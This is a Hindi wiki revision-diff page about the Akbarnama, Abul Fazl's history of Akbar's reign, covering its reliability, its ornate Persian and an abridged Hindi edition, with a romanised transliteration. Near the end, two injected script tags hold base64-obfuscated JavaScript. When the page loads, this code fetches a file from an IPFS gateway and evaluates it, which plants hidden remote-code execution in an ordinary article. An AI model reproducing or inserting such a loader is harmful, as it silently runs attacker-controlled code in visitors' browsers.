Difference between revisions of "अकबरनामा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
*अकबरनामा अकबर के शासनकाल में लिखा गया प्रामाणिक इतिहास है, क्योंकि लेखक को इसकी बहुत सी बातों की निजी जानकारी थी और सरकारी कागज़ों तक उसकी पहुँच थी।  
 
*अकबरनामा अकबर के शासनकाल में लिखा गया प्रामाणिक इतिहास है, क्योंकि लेखक को इसकी बहुत सी बातों की निजी जानकारी थी और सरकारी कागज़ों तक उसकी पहुँच थी।  
 
*यद्यपि इसमें अकबर के साथ कुछ पक्षपात किया गया है, तथापि तिथियों और भौगोलिक जानकारी के लिए यह विश्वसनीय है।
 
*यद्यपि इसमें अकबर के साथ कुछ पक्षपात किया गया है, तथापि तिथियों और भौगोलिक जानकारी के लिए यह विश्वसनीय है।
 +
*अकबर नामा में दो हजार से अधिक पृष्ठ हैं। इसका अधिकांश भाग अकबर की स्तुति है या भोज आनन्द, प्रमोद या सेना संचालनों का वर्णन है, जो ऐतिहासिक दृष्टि से उपयोगी नहीं है।
 +
*इसकी मूल भाषा फारसी जटिल और आडम्बर पूर्ण है।
 +
*इसके विद्वान अंग्रेज़ी अनुवादक बिवरिज ने लिखा है कि यदि कोई लेखक परिश्रम करके इसके व्यर्थ स्थलों को निकाल कर को ज्यों के त्यों रखकर संक्षेप कर दे तो इतिहास की बड़ी सेवा हो।
 +
*लेखक डॉ० मथुरा लाल शर्मा ने इसी लक्ष्य को दृष्टि में रखकर अबुल फजल के अकबर नामें की तीन जिल्दों की दो जिल्द बना दी हैं जिसमें 707 पृष्ठ हैं। अकबर के समय की महत्वपूर्ण घटना कोई नहीं छोड़ी गई है और यथा-सम्भव अबुल फजल के शब्दों में ही उनका वर्णन है, परन्तु भाषा की जटिलता निकालकर सरलता कर दी गई है।
 +
*यत्र तत्र लेखक के चाटुतापूर्ण उल्लेखों का भी समावेश कर दिया गया है जिससे पाठकों को उसकी मनोवृत्ति का अनुमान हो सकेगा। अकबर के समय के इतिहास को जानने के लिये अकबरनामा सर्वार्धिक प्रमाणित ग्रन्थ है।{{cite web |url=http://www.printsasia.com/BookDetails.aspx?Id=641635646 |title=शेख अबुल फजल कृत अकबरनामा |accessmonthday= |accessyear= |last= |first= |authorlink= |format= |publisher=http://www.printsasia.com/BookDetails.aspx?Id=641635646 |language=हिन्दी}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1

Revision as of 06:53, 29 December 2010

  • akabaranama badashah akabar ke shasan kal ka itihas, jise akabar ke dost aur darabari abul fazal ne likha tha.
  • akabaranama akabar ke shasanakal mean likha gaya pramanik itihas hai, kyoanki lekhak ko isaki bahut si batoan ki niji janakari thi aur sarakari kagazoan tak usaki pahuanch thi.
  • yadyapi isamean akabar ke sath kuchh pakshapat kiya gaya hai, tathapi tithiyoan aur bhaugolik janakari ke lie yah vishvasaniy hai.
  • akabar nama mean do hajar se adhik prishth haian. isaka adhikaansh bhag akabar ki stuti hai ya bhoj anand, pramod ya sena sanchalanoan ka varnan hai, jo aitihasik drishti se upayogi nahian hai.
  • isaki mool bhasha pharasi jatil aur adambar poorn hai.
  • isake vidvan aangrezi anuvadak bivarij ne likha hai ki yadi koee lekhak parishram karake isake vyarth sthaloan ko nikal kar ko jyoan ke tyoan rakhakar sankshep kar de to itihas ki b di seva ho.
  • lekhak d aau0 mathura lal sharma ne isi lakshy ko drishti mean rakhakar abul phajal ke akabar namean ki tin jildoan ki do jild bana di haian jisamean 707 prishth haian. akabar ke samay ki mahatvapoorn ghatana koee nahian chho di gee hai aur yatha-sambhav abul phajal ke shabdoan mean hi unaka varnan hai, parantu bhasha ki jatilata nikalakar saralata kar di gee hai.
  • yatr tatr lekhak ke chatutapoorn ullekhoan ka bhi samavesh kar diya gaya hai jisase pathakoan ko usaki manovritti ka anuman ho sakega. akabar ke samay ke itihas ko janane ke liye akabaranama sarvardhik pramanit granth hai.

shekh abul phajal krit akabaranama (hindi) http://www.printsasia.com/BookDetails.aspx?Id=641635646.

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh